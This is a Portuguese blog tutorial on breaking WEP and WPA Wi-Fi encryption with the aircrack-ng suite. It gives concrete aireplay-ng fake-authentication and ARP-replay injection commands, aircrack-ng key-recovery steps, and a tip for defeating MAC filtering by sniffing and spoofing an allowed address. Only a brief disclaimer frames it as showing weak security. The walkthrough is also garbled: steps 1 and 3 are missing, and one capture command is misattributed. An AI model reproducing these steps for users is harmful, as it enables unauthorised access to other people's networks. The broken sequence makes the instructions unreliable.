Professional Documents
Culture Documents
POST ATUALIZADO:
Alguns usuários relataram que alguns roteadores novos não estão possibilitando
quebrar a senha WEP nem WPA. É importante lembrar que o sinal da sua
placa wireless tem que estar forte. Aqui no blog, coloquei um post de como fazer uma
antena wireless usando lata de batata pringles ou lata de óleo, também chamada de
Cantenna. No site da aircrack também há alguns updates do software e de drivers.
Há pelo menos uns quatro ou cinco softwares bons para quebrar segurança em redes que
utilizam WEP ou WPA e o ataque, apesar de usar força bruta e um pouco de
matemática, realmente funciona.
O intuito aqui não é estimular o ataque às redes disponíveis e sim mostrar um pouco da
fragilidade de segurança.
Objetivos:
=========
– Pesquisar o modo que os pacotes são transmitidos pela rede sem fio;
– Localizar uma forma de captar os pacotes através de um sniffer;
– Quebrar a senha WEP / WPA;
Minha pesquisa baseou-se inicialmente no modo em que os pacotes são enviados pela
rede sem fio e de uma possível forma de captar os pacotes. A partir desse princípio,
localizar uma forma de quebrar a criptografia do WEP e do WPA.
Nota 1:
Você pode ler meu outro post que fala sobre a criação de uma Cantena ou Cantenna,
usando uma lata de batata pringles, amplificando seu sinal. Para quem não acredita,
realmente funciona.
Nota 2:
Para poder executar os passos aqui citados, sua placa de rede PRECISA TER
SUPORTE AO MODO DE MONITORAMENTO E INJEÇÃO DE PACOTES!
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
Nota 3:
Se você tiver que comprar uma placa de rede Wireless, aproveite para achar uma que
tenha conector para acoplar antena externa.
Utilitários:
============
– Notebook rodando Mandriva Linux 2008 (ou qualquer outra distribuição linux) dentro
de uma Virtual Machine [abaixo explico os motivos]
– Aircrack-ng, aireplay, airodump-ng [ http://www.aircrack-ng.org/ ]
– Adaptador Wireless USB GWL-G122 Revisão C [ Ver compatibilidade no site do
Aircrack ]
Não está no escopo desse post os detalhes da instalação do Linux, mas se você tiver o
VMWare (software responsável por emular SO’s), no próprio site do Aircrack já tem
uma prontinha pra usar
http://www.aircrack-ng.org/doku.php#virtual_machine1
Quebrando as senhas:
===================
WEP
Mais fácil de quebrar, pois o ataque apesar de usar força bruta, utiliza estatística e
pedaços da chave enviado nos pacotes para acelerar a quebra.
Quanto mais IV’s capturados pelo Aircrack, maior a chance de quebra. IV é um pacote
capturado que pode ser usado para recuperar um pedaço de chave.
Uma dica importante é não ficar esperando a rede enviar IV’s para você e sim você
tentar aumentar o número de capturas com ataques ARP, chopchop e fragmentação.
2 – Filtre a rede desejada por canal / bssid e deixe ele parado rodando.
aircrack-ng -c canal –bssid 00:00:00:00 -w arquivo_saida interface_rede
Onde:
canal = Canal mostrado pelo comando 1
00:00:00:00 = Mac Address do AccessPoint escolhido para o ataque mostrado no
comando 1
arquivo_saida = Nome do arquivo que o aplicativo irá salvar e que será usado para
capturar a senha
interface_rede = Interface wireless usada (wifi0, rausb0, etc)
Consegui quebrar WEP com 5.000 IVs mas um número bom, gira em torno dos 80.000.
Onde:
nome = ESSID da rede, ou melhor, o nome do AccessPoint que mostra pra você no
comando 1
bssid = BSSID da rede (mac address do AP)
mac_sua_placa_rede = Mac Address da sua placa de rede
interface de rede = interface da rede wifi
Comando exemplo:
aireplay-ng -1 0 -e RedeWireless -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 rausb0
Nota: Alguns AccessPoints possuem filtro por MAC Address. Caso a associação não
funcione, utilize o tcpdump para achar um MAC que esteja liberado e troque o MAC da
sua placa com o MacChanger.
4.1 – Abra um novo terminal e execute o aireplay para tentar gerar replicação de
pacote ARP
aireplay-ng -3 -b bssid -h mac_sua_placa interface_rede
Onde:
-3 = é o tipo de ataque ARP
bssid = Mac do AccessPoint
mac_sua_placa = Mac Address da sua placa de rede
interface_rede = Interface da rede wifi
Deixe o terminal parado por alguns minutos. Esse comando precisa de alguns pacotes
ARP na rede para gerar o tráfego. Um usuário conectado com cabo no AP é suficiente
para o ataque funcionar.
5 – Descubra a chave
aircrack-ng -b bssid arquivo*.cap
Onde:
bssid = Mac do AccessPoint que está ativo capturando pacotes
arquivo*.cap = Prefixo do arquivo colocado no comando 1
Você nunca achará a chave original e sempre a chave em hexa. Remova os dois pontos
“:” e tente conectar na rede. Bingo!!
É isso aí